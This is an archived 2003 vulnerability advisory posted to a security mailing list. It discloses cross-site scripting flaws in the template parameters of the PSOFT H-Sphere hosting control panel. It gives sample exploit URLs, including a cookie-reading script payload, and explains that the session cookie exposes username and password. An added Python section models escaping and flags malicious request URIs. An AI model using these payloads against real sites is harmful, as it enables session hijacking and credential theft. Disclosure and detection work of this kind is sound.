PSOFT H-Sphere Cross Site Scripting Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappcat_private)
Date: Mon Jun 09 2003 - 11:26:46 PDT


    --------------------
    Product: PSOFT H-Sphere ( Hosting Control Panel )
    Vendor: PSOFT ( Positive Software Corporation )
    Versions:
             VULNERABLE
    
             - 2.3.x
             - 2.2.x
             - 2.1.x
             - 2.0.x
    
             NOT VULNERABLE
    
             - ?
    ---------------------
    
    Description:
    
    H-Sphere is a scalable multi-server web hosting control panel which provides
    complete hosting automation for Linux, BSD and Win2000 platforms, is easy to
    use, and has an extensive user interface, a billing solution, and an
    integrated trouble ticket system.
    
    -----------------------------------------
    SECURITY HOLES FOUND and PROOFS OF CONCEPT:
    -----------------------------------------
    
    I encountered a lot of XSS (Cross Site Scripting) vulnerabilities in
    PSOFT's product called H-Sphere, located in the template inclusion system.
    The flaw is in the way the template system includes an HTML template page:
    if the page does not exist, the system prints an error like this:
    
    Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]'
    
    With this you can insert HTML and script code by passing it in the URL like
    this:
    
    http://[TARGET]/[PATH TO PSOFT H-SPHERE INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES YOUR CODE]
    
    
    The new error page prints this:
    
    Unknown template : '[HERE COMES YOUR CODE]'
    
    and the user's web browser executes all the code and scripts included in the
    new error page.
    This can be used to steal user cookies like this:
    
    MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00
    
    STRUCTURE OF THE H-SPHERE COOKIE:
    
    MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]
    
    You can modify your H-Sphere cookie according to the stolen user cookie and
    use the system with the user's credentials; think of modifying user hosting
    plans... ;-) .
    
    Please note: the user must be logged in with a valid session the whole time,
    or the attacker must use a specially crafted URL to include commands on the
    client side through the template system. I am thinking of some public
    URLs...
    
    
    --------------
        SAMPLES
    --------------
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&password=[PASSWORD]
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<H1>xss</H1>
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<IFRAME>
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<h1>XSS
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<script>alert(document.cookie);</script>
    
    
    All URLs that use the template, ftemplate or template_name URL input are
    affected by this type of XSS attack.
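    As an added illustration (not code from the advisory or from H-Sphere itself), the following Python models the unescaped "Unknown template" error described above beside an HTML-escaped version, and checks request URIs for markup in the reflected parameters named above; the request lines are constructed samples shaped like the advisory's URLs, and the function names are my own.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Parameters the advisory reports as reflected into the error page.
REFLECTED_PARAMS = ("template_name", "ftemplate", "template", "requestURL")

def unknown_template_error(template_name: str, escape: bool = True) -> str:
    """Build the 'Unknown template' error body.

    escape=False mimics the behaviour described above: the requested name is
    copied into the HTML verbatim, so markup in the query string is rendered.
    escape=True HTML-escapes it (quotes included), so it is shown as text.
    """
    shown = html.escape(template_name, quote=True) if escape else template_name
    return f"Unknown template : '{shown}'"

def query_params(request_uri: str):
    """Yield (name, value) pairs of the query string, URL-decoded."""
    for pair in urlsplit(request_uri).query.split("&"):
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)

def suspicious_template_params(request_uri: str) -> dict:
    """Return reflected parameters whose decoded value contains HTML markup
    or a quote (enough to break out of the quoted error text)."""
    hits = {}
    for name, value in query_params(request_uri):
        if name in REFLECTED_PARAMS and any(c in value for c in "<>\"'"):
            hits[name] = value
    return hits

def scan(request_uris):
    """Return the request URIs that carry markup in a reflected parameter."""
    return [r for r in request_uris if suspicious_template_params(r)]

# Constructed sample request URIs shaped like the advisory's samples (hypothetical).
SAMPLE_REQUESTS = [
    "/servlet/psoft.hsphere.CP/user/1234/psoft.hsphere.CP?template_name=design/index.html",
    "/servlet/psoft.hsphere.CP/user/1234/psoft.hsphere.CP"
    "?template_name=%3Cscript%3Ealert(document.cookie);%3C/script%3E",
    "/servlet/psoft.hsphere.CP?action=login&ftemplate=x"
    "&requestURL=%22%3E%3Ch1%3EXSS%3Ca%20href=%22&login=u&password=p",
]

if __name__ == "__main__":
    print(unknown_template_error("<h1>xss</h1>", escape=False))  # raw reflection
    print(unknown_template_error("<h1>xss</h1>"))                # escaped
    for r in scan(SAMPLE_REQUESTS):
        print("flagged:", r)
```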
    
    
    -------------------------
    | CONCLUSIONS AND NOTES |
    -------------------------
    
    All the URLs that use this template inclusion input are affected by this
    hole.
    User data and cookies can be stolen this way without permission.
    Under some conditions we can pass server-based commands.
    The server can be made to pick up specially crafted URLs and input values.
    We can enter other users' domain configurations by passing a specific
    domain ID value.
    
    - I tested this on the official PSOFT demo and it worked, but recently they
    changed the demo and no longer allow me to enter the system.
    The system says a Generic Error.  ;-).
    
    -----------
    | CONTACT |
    -----------
    
    Lorenzo Manuel Hernandez Garcia-Hierro
     --- Computer Security Analyzer ---
     --Nova Projects Professional Coding--
     PGP: Keyfingerprint
     B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
     ID: 0x9C38E1D7
     **********************************
     www.novappc.com
     security.novappc.com
     www.lorenzohgh.com
     ______________________
    



    This archive was generated by hypermail 2b30 : Mon Jun 09 2003 - 13:18:38 PDT